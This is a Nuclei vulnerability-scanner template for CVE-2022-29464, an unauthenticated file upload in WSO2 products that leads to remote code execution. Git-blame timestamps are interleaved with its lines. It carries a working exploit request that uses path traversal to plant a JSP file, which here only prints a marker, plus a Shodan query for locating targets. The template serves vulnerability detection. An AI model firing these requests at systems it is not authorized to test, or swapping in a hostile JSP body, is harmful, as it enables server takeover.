2022-04-21 07:02:42 +00:00
id : CVE-2022-29464
info :
2022-05-20 21:38:52 +00:00
name : WSO2 Management - Arbitrary File Upload & Remote Code Execution
2022-04-21 07:02:42 +00:00
author : luci,dhiyaneshDk
severity : critical
2022-05-20 21:38:52 +00:00
description : |
Certain WSO2 products allow unrestricted file upload with resultant remote code execution. This affects WSO2 API Manager 2.2.0 and above through 4.0.0; WSO2 Identity Server 5.2.0 and above through 5.11.0; WSO2 Identity Server Analytics 5.4.0, 5.4.1, 5.5.0, and 5.6.0; WSO2 Identity Server as Key Manager 5.3.0 and above through 5.10.0; and WSO2 Enterprise Integrator 6.2.0 and above through 6.6.0.
2022-04-21 07:02:42 +00:00
reference :
- https://shanesec.github.io/2022/04/21/Wso2-Vul-Analysis-cve-2022-29464/
- https://docs.wso2.com/display/Security/Security+Advisory+WSO2-2021-1738
2022-04-21 07:11:01 +00:00
- https://github.com/hakivvi/CVE-2022-29464
2022-05-20 21:38:52 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2022-29464
2022-04-22 16:31:52 +00:00
classification :
2022-05-17 09:18:12 +00:00
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score : 9.8
2022-04-22 16:31:52 +00:00
cve-id : CVE-2022-29464
2022-05-17 09:18:12 +00:00
cwe-id : CWE-434
2022-04-21 07:02:42 +00:00
metadata :
shodan-query : http.favicon.hash:1398055326
2022-07-21 17:18:22 +00:00
tags : cve,cve2022,rce,fileupload,wso2,intrusive,kev
2022-04-21 07:02:42 +00:00
requests :
- raw :
- |
POST /fileupload/toolsAny HTTP/1.1
Host : {{Hostname}}
Content-Type : multipart/form-data; boundary=---------------------------250033711231076532771336998311
Content-Length : 348
-----------------------------250033711231076532771336998311
Content-Disposition : form-data; name="../../../../repository/deployment/server/webapps/authenticationendpoint/{{to_lower("{{randstr}}")}}.jsp";filename="test.jsp"
Content-Type : application/octet-stream
<% out.print("WSO2-RCE-CVE-2022-29464"); %>
-----------------------------250033711231076532771336998311 --
- |
GET /authenticationendpoint/{{to_lower("{{randstr}}")}}.jsp HTTP/1.1
Host : {{Hostname}}
req-condition : true
matchers :
- type : dsl
dsl :
2022-05-20 21:38:52 +00:00
- "contains(body_2, 'WSO2-RCE-CVE-2022-29464')"
# Enhanced by mp on 2022/05/19